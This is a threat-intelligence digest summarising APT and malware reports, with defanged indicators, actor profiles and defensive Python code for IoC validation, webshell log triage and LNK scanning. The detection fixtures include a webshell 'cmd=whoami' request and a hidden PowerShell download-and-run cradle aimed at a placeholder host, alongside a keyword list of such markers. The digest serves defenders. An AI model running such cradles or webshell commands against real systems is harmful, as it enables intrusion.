Full Report
This is a weekly threat intelligence report review from RST Cloud. This week, we analysed 49 threat intelligence reports and compiled a concise summary of each, along with the pertinent metadata extracted from them. Below is a short summary of 10 of those reports, with the related threats, tools and threat actors, a link to the source, and indicators of compromise (IoCs) extracted from the original reports. More granular information on all reports, including TTPs, is available via RST Report Hub.

Title: China-Nexus Nation State Actors Exploit SAP NetWeaver (CVE-2025-31324) to Target Critical Infrastructures
Link: https://blog.eclecticiq.com/china-nexus-nation-state-actors-exploit-sap-netweaver-cve-2025-31324-to-target-critical-infrastructures
Summary: In April 2025, advanced persistent threat (APT) groups linked to China, including UNC5221, UNC5174, and CL-STA-0048, ran targeted exploitation campaigns against critical infrastructure using a vulnerability in SAP NetWeaver (CVE-2025-31324) that allows unauthenticated file uploads leading to remote code execution. Analysts found that the attackers performed reconnaissance on compromised SAP systems connected to industrial control networks, deploying webshells and the Rust-based malware KrustyLoader to maintain persistence and execute commands without detection. The groups focused on essential services, particularly medical device manufacturing and government, aiming to gain high-privilege access to sensitive networks; the campaign highlights the risk to national and economic security posed by exploitation of widely used enterprise applications.
Threats: cl-sta-0048_campaign unc5221_group krustyloader unc5174_group snowlight vshell powershell_shell_tool sliver_c2_tool goreverse opendir_technique behinder connectwise_tool screenconnect_tool

Title: Korea National Security Strategy Think Tank Appanum APT37 Attack Case Analysis (Operation Name, Toy Box Story)
Link: https://www.genians.co.kr/blog/threat_intelligence/toybox-story
Summary: APT37, a North Korean hacking group, has executed spear-phishing attacks against North Korean activists, using Dropbox to distribute LNK files disguised as invitations to a fake event related to South Korea's national security. The LNK files contain PowerShell scripts that download and execute malware from the RoKRAT family, using fileless techniques to evade detection by traditional antivirus products. The group's use of trusted cloud services for command and control complicates detection and lets APT37 refine its methods without significant changes to its malware code, keeping it a persistent threat to its targets.
Threats: toybox_story_campaign scarcruft_group spear-phishing_technique rokrat watering_hole_technique lolbin_technique

Title: Analysis of APT37 Attack Case Disguised as a Think Tank for National Security Strategy in South Korea (Operation. ToyBox Story)
Link: https://www.genians.co.kr/en/blog/threat_intelligence/toybox-story
Summary: In March 2025, the North Korean state-sponsored group APT37 launched a spear-phishing campaign called "Operation: ToyBox Story", targeting North Korean activists under the guise of an academic forum. The attack relied on social engineering, delivering malicious LNK files inside ZIP archives via Dropbox links. These LNK files executed hidden PowerShell commands upon extraction, deploying RoKRAT malware, which runs filelessly, collects system data, and communicates with cloud-based command and control servers. The malware used Dropbox for data exfiltration and encrypted the transmitted data, and it supports real-time screenshot capture and remote command execution. APT37's tactics show a pattern of reusing behavioural signatures and abusing public resources, reflecting adaptive strategies in its cyber operations.
Threats: toybox_story_campaign scarcruft_group spear-phishing_technique rokrat watering_hole_technique lolbin_technique

Title: Don't drop password managers (but password managers shouldn't drop malware)
Link: https://labs.withsecure.com/content/dam/labs/docs/W_Intel_Research_KeePass_Trojanised_Malware_Campaign.pdf
Summary: In February 2025, WithSecure identified a new trojanised malware loader, KeeLoader, linked to an initial access broker with a history of high-profile ransomware attacks. The malware modified the legitimate KeePass password manager to include a Cobalt Strike beacon, used trusted certificates for distribution, and evaded detection by altering only minimal parts of the original software. Delivery used non-traditional methods such as rogue advertisements leading to inadvertent downloads, backed by an operational infrastructure with multiple command and control domains; the campaign marks an evolution in ransomware tactics, abusing a well-known application to facilitate credential theft and unauthorised access.
Threats: cobalt_strike keeloader typosquatting_technique nitrogen credential_stealing_technique watering_hole_technique solana_private_keys_exfil_campaign rhadamanthys unc4696_group blackbasta blackcat akira_ransomware fakebat eugenfest_actor blackbasta_group batloader tramp_actor ta577_group ghost_pulse_actor belialdemon_group conti lockbit

Title: Fileless Execution: PowerShell Based Shellcode Loader Executes Remcos RAT
Link: https://blog.qualys.com/vulnerabilities-threat-research/2025/05/15/fileless-execution-powershell-based-shellcode-loader-executes-remcos-rat
Summary: Cybercriminals are increasingly using PowerShell for stealthy attacks that bypass traditional antivirus defences, notably to deliver the Remcos Remote Access Trojan (RAT), which gives extensive control over compromised systems. Recent attack chains use malicious LNK files disguised as Office documents and executed via mshta.exe, with a PowerShell-based loader, "K-Loader", that uses obfuscated VBScript inside HTA files to drive the infection. The loader downloads a heavily obfuscated PowerShell script that modifies system settings for persistence and uses techniques including process hollowing and direct in-memory execution to evade detection and keep running while communicating continuously with its command-and-control server.
Threats: remcos_rat k-loader process_injection_technique process_hollowing_technique icmluautil_tool uac_bypass_technique
Indicators of compromise:
-------------------------
ip: 193[.]142[.]146[.]101, 162[.]254[.]39[.]129
domain: readysteaurants[.]com, readystearants[.]com
url: https://mytaxclientcopy[.]com/xlab22[.]hta
hash:
- sha256=85dcc4bafccb5b9e255f75c2cd96fec1b4a5b30d09ae0d8eb571b312511d7df7
- sha256=ce5ee4a1991fa0a9030dc9e2e0601dc0f14c7961e6550921d8fd2cc4ec53a042
- sha256=ab8caac901b477c08934ec63978400eb369efb655114805ccba28c48272e5dad
- md5=bf32ff64ac0cfee67f4b2df27733576a
- md5=b63178f562b948b850f4676d4b8db1c0
- md5=dd7f049a4b573cc48e0412902a2c14b5

Title: Unveiling Swan Vector APT Targeting Taiwan and Japan with varied DLL Implants
Link: https://www.seqrite.com/blog/swan-vector-apt-targeting-taiwan-japan-dll-implants/
Summary: The "Swan Vector" campaign, discovered by the Seqrite Labs APT team, targets educational institutions and the mechanical engineering sector in East Asia, particularly Taiwan and Japan, with a multi-stage malware ecosystem. The attack begins with a malicious ZIP file containing a shortcut file that leads to execution of a DLL implant called Pterois, which downloads further payloads while disguising its activity under benign file names. The campaign then deploys a second implant, Isurus, which uses DLL sideloading and direct memory manipulation to execute shellcode stealthily, with operational tactics resembling those of earlier APT groups such as Winnti and Lazarus. The campaign's infrastructure is linked to East Asia, and further malicious activity related to applications such as Python and OneDrive is anticipated.
Threats: swan_vector_campaign pterois isurus cobalt_strike lolbin_technique dll_sideloading_technique process_injection_technique winnti_group lazarus_group stone_panda_group spear-phishing_technique smuggling_technique

Title: Horabot Unleashed: A Stealthy Phishing Threat
Link: https://www.fortinet.com/blog/threat-research/horabot-unleashed-a-stealthy-phishing-threat
Summary: In April, FortiGuard Labs discovered a new threat named Horabot, which targets Spanish-speaking users through phishing emails impersonating genuine invoices or financial documents. Opening the malicious attachment can lead to theft of the victim's email credentials, after which the malware abuses Outlook's COM automation to send phishing messages from the compromised account. Horabot combines VBScript, AutoIt, and PowerShell to perform reconnaissance, steal information, and download further payloads while evading detection. It also collects system information and sends it to the command and control server, letting the attackers profile infected systems and carry out further activity such as sending phishing emails and stealing credentials from web browsers.
Threats: horabot_botnet

Title: More_Eggs? A Venom Spider Backdoor Targeting HR
Link: https://denwp.com/more_eggs_venom_spider_phishing_campaign/
Summary: More_Eggs is a JavaScript backdoor used by the financially motivated Venom Spider group and distributed primarily through a Malware-as-a-Service (MaaS) model, targeting HR departments. Analysis of a recent sample, Sebastian Hall.zip, showed heavily obfuscated stages driven by a Windows shortcut (LNK) file that runs a malicious command to start payload delivery through a seemingly benign batch script. The script can manipulate legitimate system files to mask its actions while establishing command-and-control communications, and it uses server-side polymorphism to generate a unique payload for each victim and evade antivirus detection.
Threats: venom_spider_group more_eggs cobalt_group magecart_group polymorphism_technique lolbas_technique

Title: Operation RoundPress
Link: https://www.welivesecurity.com/en/eset-research/operation-roundpress/
Summary: ESET researchers have uncovered Operation RoundPress, a cyber espionage operation linked to the Russia-aligned Sednit group (APT28, Fancy Bear) that targets webmail servers to siphon sensitive data from high-profile accounts. The group uses spear-phishing emails to trigger Cross-Site Scripting (XSS) vulnerabilities, notably CVE-2020-35730 in Roundcube and new flaws found in Zimbra and MDaemon in 2024, and so inject malicious scripts. The payloads, SpyPress variants, steal credentials and exfiltrate contacts, and SpyPress.MDAEMON can bypass two-factor authentication. The researchers note that some techniques may be borrowed from other threat groups, and that the unpatched vulnerabilities pose a significant risk to organisations, particularly amid ongoing geopolitical tensions.
Threats: roundpress_campaign fancy_bear_group spypress spear-phishing_technique unc3707_group credential_stealing_technique winter_vivern_group

Title: Marbled Dust leverages zero-day in Output Messenger for regional espionage
Link: https://www.microsoft.com/en-us/security/blog/2025/05/12/marbled-dust-leverages-zero-day-in-output-messenger-for-regional-espionage/
Summary: Microsoft Threat Intelligence has identified a Turkish-affiliated espionage actor, Marbled Dust, that has exploited a zero-day vulnerability (CVE-2025-27920) in the Output Messenger chat application since April 2024. The group targets entities linked to the Kurdish military in Iraq and has previously focused on government organisations in Europe and the Middle East that are seen as opposing Turkish interests. Its operations involve confirming that a target uses Output Messenger, gaining access to the messaging server to deploy malicious files for data exfiltration, and using a backdoor written in Go to execute remote commands and connect to command-and-control domains. Microsoft notified the Output Messenger developers, who patched the exploited vulnerability and another, unexploited one (CVE-2025-27921); the activity reflects the increased sophistication of Marbled Dust's attack methods.
Threats: sea_turtle_group dns_hijacking_technique typosquatting_technique plink_tool putty_tool
Indicators of compromise:
-------------------------
domain: api[.]wordinfos[.]com
url: https://api[.]wordinfos[.]com
hash:
- sha256=1df959e4d2f48c4066fddcb5b3fd00b0b25ae44f350f5f35a86571abb2852e39
- sha256=2b7b65d6f8815dbe18cabaa20c01be655d8475fc429388a4541eff193596ae63

This article was generated with the assistance of an artificial intelligence language model, ChatGPT.
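As an added example (not code from RST Cloud or from any of the reports above): a small Python parser for the defanged IoC layout the entries use (ip/domain/url/hash/email fields, `[.]` defanging, `- ` bulleted hashes), which refangs each value and rejects malformed ones such as an out-of-range IPv4 octet or a digest of the wrong length before anything is loaded into a blocklist. The sample entry, its placeholder values, and the validation rules are assumptions of mine, not part of the digest.

```python
"""Parse and validate the defanged IoC blocks used in the digest entries above."""
import ipaddress
import re
from typing import Dict, List, Tuple

FIELDS = ("ip", "domain", "url", "hash", "email")
HASH_LENGTHS = {"md5": 32, "sha1": 40, "sha256": 64}
DOMAIN_RE = re.compile(r"(?=.{1,253}$)([a-z0-9-]{1,63}\.)+[a-z]{2,63}")
EMAIL_RE = re.compile(r"[^@\s,]+@([a-z0-9-]+\.)+[a-z]{2,63}")
HASH_RE = re.compile(r"(md5|sha1|sha256)=([0-9a-f]+)")

# Constructed sample in the digest's own field layout. The values are placeholders,
# not indicators from any report on this page; the last IP and the third hash are
# deliberately malformed so the validator has something to reject.
SAMPLE_ENTRY = (
    "Title: Example report\n"
    "Link: https://example.invalid/report\n"
    "Summary: Placeholder summary.\n"
    "Threats: example_campaign example_loader\n"
    "Indicators of compromise:\n"
    "-------------------------\n"
    "ip: 192[.]0[.]2[.]10, 198[.]51[.]100[.]7:8443, 999[.]1[.]1[.]1\n"
    "domain: c2[.]example[.]test, stage[.]example[.]test\n"
    "url: hxxps://c2[.]example[.]test/stage/config[.]sh, "
    "https://stage[.]example[.]test:8443/a\n"
    "hash: - sha256=" + "a" * 64 + ", - md5=" + "b" * 32 + ", - sha256=" + "c" * 63 + "\n"
    "email: ops@example[.]test\n"
)


def refang(value: str) -> str:
    """Undo the defanging conventions used in the digest ([.], [:], [@], hxxp)."""
    return (value.replace("[.]", ".").replace("[:]", ":").replace("[@]", "@")
            .replace("hxxps://", "https://").replace("hxxp://", "http://"))


def parse_iocs(entry: str) -> Dict[str, List[str]]:
    """Collect the raw values under each IoC field of one entry and refang them.

    Assumes one field per line after the 'Indicators of compromise:' marker,
    comma-separated values, and an optional '- ' bullet before each hash.
    """
    found: Dict[str, List[str]] = {f: [] for f in FIELDS}
    in_block = False
    for line in entry.splitlines():
        line = line.strip()
        if line.startswith("Indicators of compromise:"):
            in_block = True
            continue
        if not in_block or not line or set(line) == {"-"}:
            continue                      # skip text before the block and the underline
        key, sep, rest = line.partition(":")
        key = key.strip().lower()
        if not sep or key not in found:
            continue
        for raw in rest.split(","):
            value = raw.strip().lstrip("-").strip()
            if value:
                found[key].append(refang(value))
    return found


def check_value(field: str, value: str) -> str:
    """Return '' when the value is well-formed for its field, else the reason it is not."""
    if field == "ip":                     # IPv4 only (as in the digest), optional :port
        host, _, port = value.partition(":")
        try:
            ipaddress.IPv4Address(host)
        except ValueError:
            return "not an IPv4 address"
        if port and not (port.isdigit() and 0 < int(port) < 65536):
            return "bad port"
    elif field == "domain" and not DOMAIN_RE.fullmatch(value.lower()):
        return "not a hostname"
    elif field == "url" and not value.startswith(("http://", "https://")):
        return "unsupported scheme"
    elif field == "hash":
        m = HASH_RE.fullmatch(value.lower())
        if not m:
            return "unknown hash format"
        if len(m.group(2)) != HASH_LENGTHS[m.group(1)]:
            return f"{m.group(1)} digest has wrong length"
    elif field == "email" and not EMAIL_RE.fullmatch(value.lower()):
        return "not an e-mail address"
    return ""


def validate_iocs(found: Dict[str, List[str]]) -> Tuple[Dict[str, List[str]], List[Tuple[str, str, str]]]:
    """Split parsed values into well-formed ones and (field, value, reason) rejects."""
    valid: Dict[str, List[str]] = {f: [] for f in FIELDS}
    rejected: List[Tuple[str, str, str]] = []
    for field, values in found.items():
        for value in values:
            reason = check_value(field, value)
            if reason:
                rejected.append((field, value, reason))
            else:
                valid[field].append(value)
    return valid, rejected
```

Run `validate_iocs(parse_iocs(SAMPLE_ENTRY))` to get the clean indicators and the rejects; the reject list is worth reviewing by hand, since a truncated hash in a published report (as seen in one of the entries above) is more often a copy error than a different sample.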
Analysis Summary
This analysis summarizes the three most distinct, fully described threat actors from the report summaries above.
***
# Threat Actor: UNC5221, UNC5174, and CL-STA-0048 (China-Nexus Nation State Actors)
## Attribution & Identity
APT groups linked to China. Specifically mentions **UNC5221**, **UNC5174**, and **CL-STA-0048**.
## Activity Summary
In April 2025, these groups executed targeted exploitation campaigns against critical infrastructure by exploiting an unauthenticated file upload/RCE vulnerability in **SAP NetWeaver (CVE-2025-31324)**. After gaining initial access, the actors performed reconnaissance on compromised SAP systems connected to industrial control networks, deploying Webshells and the Rust-based malware **KrustyLoader** for persistence and command execution.
## Tactics, Techniques & Procedures
- Exploitation of **CVE-2025-31324** (SAP NetWeaver vulnerability allowing unauthenticated file uploads leading to RCE).
- Reconnaissance on compromised SAP systems connected to industrial control networks.
- Deployment of Webshells.
- Use of **KrustyLoader** (Rust-based malware) for persistence and command execution.
- Execution of commands while evading detection.
- Technique tagged in the report: `opendir_technique`.
- Tools tagged in the report: `powershell_shell_tool`, `sliver_c2_tool`, `goreverse`, `connectwise_tool`, `screenconnect_tool`.
## Targeting
- Sectors: Critical infrastructure, medical device manufacturing, and government.
- Geography: Not explicitly detailed in the summary; the China-nexus actors are described as targeting critical infrastructure globally.
- Victims: SAP systems connected to industrial control networks.
## Tools & Infrastructure
- Malware families used: **KrustyLoader**, **Webshells**.
- C2/Tools noted: `sliver_c2_tool`, `connectwise_tool`, `screenconnect_tool`.
- Infrastructure (IPs): 15[.]204[.]56[.]106, 43[.]247[.]135[.]53, 54[.]77[.]139[.]23, 3[.]248[.]33[.]252, 103[.]30[.]76[.]206, 45[.]155[.]222[.]14, 159[.]65[.]34[.]242, 138[.]68[.]61[.]82, 192[.]243[.]115[.]175, 107[.]175[.]77[.]118, etc. (List truncated for brevity, see original for full list).
- Infrastructure (Domains): sentinelones[.]com, aaa[.]ki6zmfw3ps8q14rfbfczfq5qkhq8e12q[.]oastify[.]com, applr-malbbal[.]s3[.]ap-northeast-2[.]amazonaws[.]com, etc.
## Implications
These actors pose a significant risk to national and economic security by exploiting widely used enterprise applications (SAP) to gain high-privilege access to sensitive networks, including those controlling industrial operations.
## Mitigations
Patching the exploited vulnerability (**CVE-2025-31324**) in SAP NetWeaver; monitoring for Webshells and unusual activity originating from SAP systems, particularly those connected to industrial control networks.
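As an added illustration of the monitoring step above (not code from the report or its sources), this Python sketch scans web-server access logs for the drop-then-use pattern: an unauthenticated POST to the upload endpoint followed by a request for a .jsp from the same source. The uploader path and the log lines are assumptions constructed for the example; confirm the path against SAP's advisory for CVE-2025-31324 before relying on it.

```python
import re
from collections import defaultdict

# Assumed (not taken from the report): the CVE-2025-31324 upload endpoint and a
# combined-format access log. Adjust both for your environment.
UPLOADER_PATH = "/developmentserver/metadatauploader"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample log lines (not real traffic). The second source POSTs to the
# uploader and then requests a JSP; the first source only probes the endpoint.
SAMPLE_LOG = """\
203.0.113.5 - - [10/May/2025:09:12:01 +0000] "GET /developmentserver/metadatauploader HTTP/1.1" 200 512
198.51.100.7 - - [10/May/2025:09:14:22 +0000] "POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.1" 200 0
198.51.100.7 - - [10/May/2025:09:14:30 +0000] "GET /irj/helper.jsp?cmd=whoami HTTP/1.1" 200 87
192.0.2.9 - - [10/May/2025:09:20:00 +0000] "GET /irj/portal HTTP/1.1" 200 4096
"""

def parse(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_webshell_candidates(log_text):
    """Return {source_ip: [jsp paths]} for sources whose successful POST to the
    uploader was followed by a request for a .jsp file (possible webshell)."""
    events = [e for e in map(parse, log_text.splitlines()) if e]
    uploaders = set()
    hits = defaultdict(list)
    for e in events:                       # log lines are in time order
        path = e["path"].split("?", 1)[0]  # drop the query string
        if e["method"] == "POST" and e["status"] == "200" \
                and path.lower().startswith(UPLOADER_PATH):
            uploaders.add(e["ip"])
        elif e["ip"] in uploaders and path.lower().endswith(".jsp"):
            hits[e["ip"]].append(path)
    return dict(hits)

if __name__ == "__main__":
    for ip, paths in find_webshell_candidates(SAMPLE_LOG).items():
        print(f"possible webshell drop from {ip}: {paths}")
```

A hit is only a triage lead: confirm by checking whether the .jsp exists on the SAP host and whether it was created at the time of the POST.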
***
# Threat Actor: APT37 (North Korean)
## Attribution & Identity
**APT37**, a North Korean hacking group; this campaign is tracked under the operation name **Toy Box Story**.
## Activity Summary
The group executed sophisticated **spear-phishing attacks** targeting **North Korean activists**. The lures involved LNK files disguised as invitations to a fake event related to South Korea's national security, distributed via **Dropbox**.
## Tactics, Techniques & Procedures
- Spear-phishing using LNK files.
- Use of **PowerShell scripts** embedded in LNK files to download and execute malware.
- Deployment of malware associated with the **"Rokrat" series**.
- Employing **fileless techniques** to evade detection by traditional antivirus.
- Utilizing trusted cloud services (Dropbox) for Command and Control (C2) communications to complicate detection.
## Targeting
- Sectors: Activists, specifically **North Korean activists**.
- Geography: Targets related to North Korean political interests (activists).
- Victims: North Korean activists.
## Tools & Infrastructure
- Malware families used: **Rokrat series** malware.
- Infrastructure: **Dropbox** utilized for distributing initial compromise files and likely C2.
- Note: `plink_tool` and `putty_tool` appear in the threat tags of the Marbled Dust summary, not in the APT37 report; they are listed here only because the source context mixes the two reports' IoCs and should not be attributed to APT37.
## Implications
APT37 demonstrates a consistent focus on ideological targets, leveraging social engineering and fileless techniques to maintain stealthy access to sensitive communications networks.
## Mitigations
Implement strict controls on LNK file execution via email/cloud services; enhance monitoring for fileless activity and PowerShell script execution; analyze network beaconing to public cloud hosting services like Dropbox for anomalous C2 activity.
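As an added example for the LNK controls above (not code from the report), this Python snippet walks the Shell Link binary format to the COMMAND_LINE_ARGUMENTS field and flags the hidden-PowerShell download markers such a lure carries; the sample link, its path and its placeholder URL are constructed for the example.

```python
import struct

# MS-SHLLINK LinkFlags bits (section 2.1.1) needed to walk to the StringData.
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORK_DIR, HAS_ARGS, IS_UNICODE = 0x10, 0x20, 0x80
STRING_ORDER = (HAS_NAME, HAS_REL_PATH, HAS_WORK_DIR, HAS_ARGS)
# PowerShell markers (lower-case) typical of a hidden download-and-run lure.
SUSPICIOUS = ("powershell", "-enc", "downloadstring", "iex", "windowstyle hidden")

def lnk_strings(data):
    """Parse the StringData fields of a .LNK into {flag: text}."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C:
        raise ValueError("not a shell link header")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76                                   # fixed-size ShellLinkHeader
    if flags & HAS_ID_LIST:                    # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                  # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    out = {}
    for flag in STRING_ORDER:                  # CountCharacters + chars, in order
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]
        pos += 2
        width = 2 if flags & IS_UNICODE else 1
        raw = data[pos:pos + count * width]
        out[flag] = raw.decode("utf-16-le" if width == 2 else "latin-1")
        pos += count * width
    return out

def lnk_powershell_indicators(data):
    """Return the suspicious markers found in the link's path and arguments."""
    f = lnk_strings(data)
    text = (f.get(HAS_REL_PATH, "") + " " + f.get(HAS_ARGS, "")).lower()
    return [m for m in SUSPICIOUS if m in text]

def build_lnk(relative_path, arguments):
    """Construct a minimal Unicode .LNK (no IDList/LinkInfo) for testing."""
    clsid = b"\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
    header = struct.pack("<I16sI", 0x4C, clsid, HAS_REL_PATH | HAS_ARGS | IS_UNICODE) + b"\x00" * 52
    field = lambda s: struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + field(relative_path) + field(arguments)

# Constructed sample lure: a hidden PowerShell cradle (placeholder URL, never fetched).
SAMPLE_LNK = build_lnk(
    r"..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-NoProfile -WindowStyle Hidden -Command \"IEX((New-Object Net.WebClient)"
    ".DownloadString('https://example.invalid/stage1'))\"",
)
```

Real lures usually also carry an IDList and LinkInfo, which the parser skips by their size fields; the marker list is a starting point for a mail-gateway or EDR rule, not an exhaustive signature.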
***
# Threat Actor: Marbled Dust (Turkish-affiliated)
## Attribution & Identity
A **Turkish-affiliated** threat actor named **Marbled Dust**. The report's threat tags also link the activity to the **Sea Turtle** group.
## Activity Summary
Marbled Dust has been actively exploiting a **zero-day vulnerability (CVE-2025-27920)** in the **Output Messenger** chat application since April 2024 for espionage. They confirm target usage of Output Messenger, access messaging servers, deploy malicious files for data exfiltration, and establish C2.
## Tactics, Techniques & Procedures
- Exploitation of **Output Messenger zero-day (CVE-2025-27920)**.
- Gaining access to messaging servers.
- Deploying backdoors crafted in **GoLang** for remote command execution.
- Techniques tagged in the report: **DNS hijacking** (`dns_hijacking_technique`) and **typosquatting** (`typosquatting_technique`).
- Tools tagged in the report: `plink_tool`, `putty_tool`.
## Targeting
- Sectors: Government organizations, entities linked to the **Kurdish military in Iraq**.
- Geography: Europe and the Middle East (those seen as opposing Turkish interests).
- Victims: Organizations aligned with Kurdish military groups and specific government entities.
## Tools & Infrastructure
- Malware families used: Custom **GoLang backdoor**.
- Infrastructure (Domains): api[.]wordinfos[.]com.
- Infrastructure (URLs): https://api[.]wordinfos[.]com.
## Implications
Marbled Dust exhibits evolving sophistication by leveraging zero-days in commercial messaging applications popular in target environments, allowing deep access into sensitive communications channels. Microsoft's disclosure also led to a patch for a second, unexploited vulnerability (CVE-2025-27921), which suggests the value of proactive vulnerability scanning against related software.
## Mitigations
Rapidly patch Output Messenger for vulnerabilities **CVE-2025-27920** and **CVE-2025-27921**. Monitor network traffic for connections to suspicious domains and analyze GoLang binaries attempting remote command execution.